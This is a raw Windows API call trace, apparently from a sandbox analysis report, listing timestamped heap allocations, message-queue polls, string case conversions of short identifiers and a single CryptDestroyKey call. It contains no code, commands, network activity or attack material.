RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0251.473] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.473] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0251.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0251.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0251.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0251.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0251.473] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0251.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0251.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0251.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0251.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0251.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0251.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0251.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0251.474] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0251.475] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0251.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0251.475] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0251.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0251.475] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0251.475] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0251.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0251.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0251.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0251.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0251.475] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0251.475] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.475] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0251.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0251.476] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0251.476] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0251.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0251.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0251.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0251.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0251.476] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0251.476] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.476] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0251.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0251.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0251.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0251.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0251.476] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.476] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0251.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0251.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0251.477] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0251.477] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0251.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0251.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0251.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0251.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0251.477] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0251.477] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.477] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0251.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0251.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0251.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0251.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0251.478] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.478] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.478] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0251.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0251.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.478] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.478] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.478] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0251.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.479] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0251.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0251.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0251.479] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0251.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0251.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0251.480] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0251.480] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0251.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0251.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0251.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0251.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.480] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0251.480] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.480] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0251.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0251.480] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.480] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0251.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0251.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0251.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0251.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.481] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.481] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0251.481] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0251.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0251.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0251.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0251.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.481] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0251.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0251.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0251.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0251.481] CryptDestroyKey (hKey=0xaa5820) returned 1 [0251.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0251.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0251.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0251.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0251.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0251.482] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0251.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0251.482] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0251.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0251.482] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0251.482] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0251.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0251.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0251.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0251.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.482] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0251.483] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0251.483] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0251.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0251.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0251.483] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0251.483] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0251.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0251.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0251.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0251.483] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0251.483] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0251.483] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0251.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0251.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0251.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0251.484] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0251.484] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0251.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0251.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0251.484] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0251.484] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0251.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0251.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0251.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0251.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0251.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.484] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0251.484] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0251.484] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0251.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0251.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0251.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0251.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0251.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.485] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0251.485] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0251.485] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0251.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0251.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0251.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0251.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0251.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0251.485] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0251.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0251.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0251.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0251.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0251.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0251.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0251.485] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.485] 